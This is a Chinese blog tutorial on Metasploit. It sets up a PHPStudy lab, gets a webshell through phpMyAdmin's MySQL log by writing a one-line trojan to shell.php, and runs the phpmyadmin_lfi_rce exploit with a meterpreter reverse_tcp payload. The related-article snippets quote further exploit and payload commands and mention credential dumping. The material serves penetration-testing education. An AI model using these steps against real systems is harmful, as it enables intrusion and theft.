Metasploit漏洞利用模块(一)

最新推荐文章于 2024-08-14 16:56:14 发布
最新推荐文章于 2024-08-14 16:56:14 发布
阅读量498 收藏 1
点赞数 1
分类专栏: Metasploit 文章标签: php mysql apache 扫描测试工具 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55313512/article/details/123366915
版权
本文介绍了如何使用PHPStudy快速搭建PHP测试环境,并详细阐述了配置漏洞测试环境的步骤,包括新建用户、权限分配和服务设置。接着,讨论了通过phpmyadmin日志写shell的方法及安全风险,提到了Meterpreter常用命令。同时,文章提供了漏洞扫描与利用的实战演示,涉及phpmyadmin的远程文件包含漏洞。最后,强调了安全防护和Meterpreter命令在渗透测试中的重要性。
摘要由CSDN通过智能技术生成

一、快速搭建有限制的测试环境

使用PHPstudy快速进行环境配置

在百度百科上对于phpstudy的定义是一个PHP调试环境的程序集成包

Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境,该程序不仅包括PHP调试环境,还包括了开发工具、开发手册等

下载地址:http://www.phpstudy.net

配置问题:https://www.xp.cn/wenda/388.html

运行库:http://www.php.cn/xiazai/gongju/1351

 

二、配置漏洞测试环境

1、新建用户www

2、权限分配

3、服务设置登录用户

先属性里面的高级设置,添加用户权限,然后再去设置用户的权限

三、phpmyadmin获取webshell

Phpmyadmin日志写shell 

前提:条件是root用户 

思路:就是利用mysql的一个日志文件。这个日志文件没执行一个sql语句就会将其执行的保存。我们将这个日志文件重命名为我们的shell.php然后执行一条sql带一句话木马的命令。然后执行菜刀连接之

设置导出文件: 

 

参考文章:https://www.jianshu.com/p/ddd41b841c36

实战演示:phpmyadmin

从漏洞扫描到漏洞利用

1)扫描靶机

msf > auxiliary/scanner/http/phpmyadmin_login 

2)选择exploit

msf> use exploit/multi/http/phpmyadmin_lfi_rce

3)选择payload

set payload php/meterpreter/reverse_tcp

4)攻击

run/exploit 

phpmyadmin4.8.1远程文件包含漏洞:https://www.jianshu.com/p/0d75017c154f

反弹shell

 

参考文章:https://xz.aliyun.com/t/2549

四、Meterpreter常用命令

 

参考地址:https://www.cnblogs.com/backlion/p/9484949.html

InfI1traTe.
关注
专栏目录
Metasploit 客户端漏洞利用实战
悦分享
11-28 883
客户端攻击总是一个有趣的话题,并成为今日攻击者的主要攻击目标。随着网络管理员和软件开发人员加强周边环境,测试人员需要找到一种方法让受害者为他们进入网络打开大门。客户端攻击需要用户交互,例如诱使用户点击链接,打开文档或以某种方式进入恶意网站。使用Metasploit执行客户端攻击的方式有很多种,我们将在这里演示其中的一些方法。
metasploit漏洞利用模块的简单使用
发哥微课堂
01-05 3511
0x00:简介 exploits 是漏洞利用模块漏洞利用是攻击者利用服务器的漏洞进行攻击的一种行为,其中包含了主流漏洞的攻击代码。 0x01:使用 以 metasploitable2 为例,刚开始,可以通过 nmap 来查看下靶机的一些信息,信息搜集端口以及端口的服务和各版本是很重要的信息,nmap 的 sV 参数来获取系统及服务版本信息如下: 可以看到给出的端口结果以及端口后面跑的...
Metasploit工具----漏洞利用模块
09-03 657
漏洞利用是指由渗透测试者利用一个系统、应用或者服务中的安全漏洞进行的攻击行为。流行的渗透攻击技术包括缓冲区溢出、Web应用程序攻击,以及利用配置错误等,其中包含攻击者或测试人员针对系统中的漏洞而设计的各种POC验证程序,用于破坏系统安全性的攻击代码,每个漏洞都有相应的攻击代码。 每个操作系统都会存在各种Bug,想Windows这样有版权的操作系统,微软公司会很快的开发针对这些Bug的补...
Metasploit漏洞利用系列(一):MSF完美升级及目录结构深度解读
最新发布
2402_86373248的博客
08-14 901
在信息安全领域,MetasploitFramework(MSF)是一个无处不在的工具,它集合了大量的渗透测试和漏洞利用模块,帮助安全专家识别和利用系统中的弱点。本文将深入探讨如何对Metasploit进行完美升级,以及对其核心目录结构进行详尽解读,为初学者和进阶使用者提供全面指南。
(菜鸟自学)漏洞利用Metasploit
nbdlsplyb的博客
12-08 1252
什么是渗透测试?渗透测试指的是用黑客的方式来攻击你自己的或者是客户的IT系统,来找到其中的安全漏洞。因此,渗透测试人员要有目标系统管理人员的准许才能进行测试。这就是渗透测试人员和黑客之间的区别。什么是vulnerability?vulnerability是指软件、硬件或者操作系统中存在的安全漏洞。一个vulnerability可以像弱密码这样简单广也可能像缓冲区溢出或者SQL注入这样复杂。我们可以使用Nexpose来扫描vulnerability。什么是exploit?
Metasploit的本地漏洞利用
课嗨教育的专栏
04-05 202
这个很简单的理解,本地例如: RAR ZIP 播放器等等,当我们用MSF生成漏洞文件后,别人用特定的工具打开,就会中马 打开UB 1 ,我们来利用ZIP吧,启动METASPLOIT 搜索rar msf > search zip Matching Modules ================ Name Disclosure Date Rank Descriptio
如何使用Metasploit进行漏洞利用
沐尘而生的博客
08-21 499
Metasploit是一款开源的渗透测试框架,它提供了一系列的工具和资源,用于发现、验证和利用系统的漏洞。它不仅具备强大的漏洞利用功能,还能帮助安全专业人员评估网络和应用的安全性。
Metasploit漏洞利用基础教程v2018.2试读陆小马功钟浩.pdf
09-14
整体来看,Metasploit漏洞利用基础教程详细介绍了如何使用Metasploit进行漏洞扫描、渗透测试、信息管理等操作。无论对于初学者还是有经验的安全人员,Metasploit都是一个不可或缺的工具,可以极大地提高网络安全测试...
Metasploit漏洞利用模块原理解析
它提供了一套完整的漏洞利用工具,包括针对不同操作系统和应用程序的漏洞利用模块,以及用于渗透测试的各种辅助工具和资源。 Metasploit框架最初是由HD Moore在2003年发起的,并在后来被Rapid7公司收购。它被广泛...
Eternalblue-Doublepulsar-Metasploit:利用漏洞Eternalblue-Doublepulsar的Metasploit模块
05-02
永恒的蓝色-双脉冲星-元宝 本软件按“原样”提供,不提供任何形式的明示或暗示担保,包括但不限于对适销性,特定目的的适用性和非侵权性的担保。 无论是由于软件,使用或其他方式产生的,与之有关或与之有关的合同,...
第三章-4 Metasploit漏洞利用模块
划水的小白白
05-13 631
每日一句: 如何一别朱仙镇,不见将军奏凯歌。 ——于谦《岳忠武王祠》 本文内容: ~快速搭建有限制的测试环境 ~实战漏洞利用 ~MSF会话常用命令 ~其他问题补充 一、快速搭建有限制的测试环境 问:搭建测试环境的作用是什么? 答:在本地测试漏洞,然后授权的情况下进行相关漏洞挖掘 0,安装虚拟机,win server2008 1,安装phpstudy ~百度,PHP study,进官网直接下载就行 ~安装PHP study可能需要一些环
26学习渗透测试工具 Metasploit 的基本用法,包括漏洞扫描、攻击模块
玩机科技社的博客
06-04 4209
Metasploit是一款广泛使用的渗透测试工具,它提供了大量的漏洞扫描、攻击模块和负载等,可以用于评估系统的安全性。下面是Metasploit的基本用法教程,包括漏洞扫描和攻击模块的使用。
【漏洞检测】metasploit 使用教程
xnxqwzy的博客
01-04 1699
Metasploitv4之后的新版本中,Meterpreter作为后渗透攻击模块的实施通道,可以根据渗透测试目标需求进行灵活扩展。涉及范围: 信息搜集、口令攫取、权限提升、内网拓展等。攻击载荷(msfpayload)是我们期望目标系统在被渗透攻击后去执行的代码,在metasploit框架中可以自由的选择、传送和植入。....Msf编码器是一个非常实用的工具,它能够改变可执行文件中的代码形状,让杀毒软件认不出它原来的样子,而程序的功能不会受到任何影响。
Metasploit(一) 利用 MS17-010 漏洞进行攻击
buffedon的博客
06-03 5829
借助 metasploit 利用 MS17-010 漏洞进行攻击Metasploit 简介 (简称:MSF)经常被利用的端口MS17-010利用流程1. 存活判断2. 端口扫描3. 服务识别4. 系统识别5. 漏洞利用后渗透阶段基础命令POST后渗透模块访问文件系统权限提升获取密码的方式run windows/gather/credentials/windows_autologinhashdump 模块mimikatz程序加载kiwi模块MSF中的 mimikatz 模块 Metasploit 简介 (简称
Metasploit 漏洞利用(Exploit)详解
悦分享
11-27 1033
由于它经常发生在SEH溢出攻击中,我们现在需要找到一个POP POP RET(其他序列也很好,以及在“击败Microsoft Windows 2003服务器的基于堆栈的缓冲区溢出预防机制”Litchfield 2003)中的地址,以便将执行流程重定向到我们的缓冲区。所以我们看到我们调用了pattern_create函数,它最多只需要两个参数,我们正在创建的缓冲区的大小以及一个可选的第二参数,它们使我们可以控制缓冲区的内容。请注意,将最初的公共漏洞利用作者命名为他们的辛勤工作是首先发现该漏洞的通常礼貌。
Metasploit工具漏洞利用MS08-067
陈珺的博客
08-12 2799
MS08-067漏洞复现收集靶机信息开始渗透后渗透命令相关命令 收集靶机信息 通过Nmap和Nessus收集靶机的IP,Nessus扫描是否存在漏洞 开始渗透 进入metasploit工具/普通终端输入msfconsle进入 测试渗透主机kali到靶机的连通性(ping) 找到kali后台针对ms08-067的漏洞利用(exploit) search ms08-067 利用漏洞 use 路径 查看利用漏洞需要配置的参数:show options 设置必要参数:lhost本机IP,rhos
使用Metasploit查找漏洞
cuyi7076的博客
06-26 4581
在部署诸如操作系统,应用程序或Web服务器之类的软件时,最大的担忧之一就是安全性。 该应用程序安全吗,还是您不知道有漏洞或漏洞? 大多数有兴趣知道此问题答案的管理员都只是依靠供应商网站上发布的各种安全公告来获取所需的信息。 但是,如果您是想深入了解其应用程序的众多管理员和安全专家之一,则可以主动验证您的软件是否确实受到威胁的影响。 在安全领域,设计了几种工具来进行所谓的漏洞测试 ,每种工具...
Metasploit漏洞利用模块及命令
m0_74025111的博客
04-24 497
msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp(反弹载荷)msf > use exploit/windows/browser/ms10_018_ie_behaviors(使用ms10_018_ie_behaviors模块)msf > use exploit/windows/browser/ms10_002_aurora (使用ms10_002_aurora模块
Metasploit漏洞利用命令详解:入门到精通
"本资源为Metasploit漏洞利用命令详解的第一课,作者为陈殷,内容涵盖了Metasploit框架的基础知识、主要作用、相关术语以及目录结构,并介绍了在Linux环境下安装和启动Metasploit的方法。" Metasploit是一款强大的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值